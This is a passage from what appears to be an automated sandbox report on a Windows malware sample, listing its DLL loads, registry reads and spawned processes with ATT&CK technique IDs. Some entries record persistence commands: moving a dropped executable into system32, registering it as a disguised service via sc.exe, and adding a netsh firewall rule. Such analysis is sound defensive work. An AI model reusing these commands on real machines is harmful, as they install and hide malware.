\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005796)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005856)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005856)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005856)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005856)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00006016)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00006016)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006016)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006016)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006016)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006016)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002772)\n \"mojpivf.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002772)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003048)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003048)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00005992)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005992)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005992)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005992)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005992)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00005992)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005992)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005992)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005992)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77540000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77540000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77540000\n \"mojpivf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77540000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77540000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77540000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"mojpivf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"mojpivf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00005924)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\mojpivf.exe\" %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00005856)\n Spawned process \"sc.exe\" with commandline \"create tpxhoiko binPath= \"%WINDIR%\\\\system32\\\\tpxhoiko\\\\mojpivf. ...\" (UID: 00000000-00006140), Spawned process \"sc.exe\" with commandline \"description tpxhoiko \"wifi internet conection\"\" (UID: 00000000-00006016), Spawned process \"sc.exe\" with commandline \"start tpxhoiko\" (UID: 00000000-00004364), Spawned process \"mojpivf.exe\" with commandline \"/d\"C:\\\\8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946fae ...\" (UID: 00000000-00002772)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00003048), Spawned process \"svchost.exe\" (UID: 00000000-00005992)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00005924) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00005924) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"mojpivf.exe\" (UID: 00000000-00002772) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"mojpivf.exe\" (UID: 00000000-00002772) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00003048) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", USERDNSDOMAIN=\"%OSUSER%-PC\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00003048) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"svchost.exe\" (UID: 00000000-00005992) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00005992) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00005924)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\mojpivf.exe\" %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00005856)\n Spawned process \"sc.exe\" with commandline \"create tpxhoiko binPath= \"%WINDIR%\\\\system32\\\\tpxhoiko\\\\mojpivf. ...\" (UID: 00000000-00006140), Spawned process \"sc.exe\" with commandline \"description tpxhoiko \"wifi internet conection\"\" (UID: 00000000-00006016), Spawned process \"sc.exe\" with commandline \"start tpxhoiko\" (UID: 00000000-00004364), Spawned process \"mojpivf.exe\" with commandline \"/d\"C:\\\\8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946fae ...\" (UID: 00000000-00002772)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00003048), Spawned process \"svchost.exe\" (UID: 00000000-00005992)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"mojpivf.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"mojpivf.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"mojpivf.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67EE4FF1.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67EE4FF1.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67EE4FF1.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67EE4FF1.bin\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" was detected as \"VC8 -> Microsoft Corporation\"\n \"mojpivf.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"DISMHOST.EXE.67EE4FF1.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"mojpivf.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\mojpivf.exe]- [targetUID: 00000000-00005856]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"mojpivf.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" reads file \"c:\\8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n 